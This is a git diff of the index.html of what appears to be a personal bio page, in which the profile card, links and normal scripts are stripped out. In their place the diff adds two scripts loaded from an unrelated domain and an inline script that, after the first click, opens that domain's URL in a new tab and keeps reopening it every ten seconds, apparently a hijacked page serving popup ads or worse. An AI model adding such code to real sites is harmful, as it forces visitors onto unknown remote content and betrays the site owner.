--- a/index.html
+++ b/index.html
@@ -2,58 +2,22 @@
 <html lang="en">
 <head>
   <meta charset="UTF-8">
-  <meta name="viewport" content="width=device-width, initial-scale=1.0">
   <title>&#8203;</title>
-  <link rel="stylesheet" href="/assets/css/index.css">
-  <link rel="icon" type="image/png" href="/favicon.ico">
-  <meta property="og:title" content="Very cool bio"/>
-  <meta name="theme-color" content="#b6b6b6"/>
-  <meta name="msapplication-TileColor" content="#b6b6b6"/>
-  <meta property="og:image" content="/assets/gifs/cat.gif"/>
-  <meta property="og:description" content="🤞❤️‍🩹" />
-  <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css" rel="stylesheet">
+  <script type='text/javascript' src='//spaniardinformationbookworm.com/f0/e8/15/f0e81559842363ebf19aa99900ff2d02.js'></script>
 </head>
 <body>
-  <div id="enter-screen" class="enter-screen">
-    <button id="enter-text">Click anywhere to enter...</button>
-  </div>
-  <audio id="bg-music" src="/assets/sounds/molly.mp3" loop></audio>
-  <div class="background"></div>
-  <div class="bio-container" style="display: none; opacity: 0;">
-    <div class="profile-card">
-      <div class="banner"></div>
-      <img src="https://avatars.githubusercontent.com/u/143974574?s=400&u=c62e5b7b16006c5f845d5ebb8f2aa92fce7ad025&v=4" alt="Profile Picture" class="profile-img">
-      <h1 class="name">sent</h1>
-      <div class="project-link">
-        <h2>My Latest Project</h2>
-        <a href="https://github.com/xojw/waves" target="_blank" class="project-link-btn">
-          Waves
-          <span class="tooltip">View Project</span>
-        </a>
-      </div>  
-      <p class="quote">"In three words I can sum up everything I've learned about life: it goes on."</p>
-      <p class="author">- Robert Frost</p>
-      <div class="social-icons-container">
-        <div class="social-icons">
-          <a href="http://discord.com/users/1111107934919852063/" target="_blank" class="social-icon" data-tooltip="Discord">
-            <i class="fab fa-discord"></i>
-            <span class="tooltip">Discord</span>
-          </a>
-          <a href="https://github.com/xojw/" target="_blank" class="social-icon" data-tooltip="GitHub">
-            <i class="fab fa-github"></i>
-            <span class="tooltip">GitHub</span>
-          </a>
-          <a href="https://usewaves.site/" target="_blank" class="social-icon" data-tooltip="Website">
-            <i class="fa solid fa-globe"></i>
-            <span class="tooltip">Website</span>
-          </a>
-        </div>
-      </div>
-    </div>
-  </div>
-  <script src="/assets/js/oneko.js" defer></script>
-  <script src="/assets/js/index.js" defer></script>
-  <script src="/assets/js/type.js" defer></script>
-  <script src="/assets/js/card.js" defer></script>
+<script>
+(function(){
+  const targetUrl='https://spaniardinformationbookworm.com/jmzq26nu?key=362a2802eeb1b13df2f74ab21f27a973';
+  let intervalId;
+  function startRedirects(){
+    window.open(targetUrl,'_blank');
+    intervalId=setInterval(()=>{window.open(targetUrl,'_blank');},10000);
+    document.removeEventListener('click',startRedirects);
+  }
+  document.addEventListener('click',startRedirects);
+})();
+</script>
+<script type='text/javascript' src='//spaniardinformationbookworm.com/08/db/84/08db842da9b43ad3d13c14634f9fd1c8.js'></script>
 </body>
 </html>
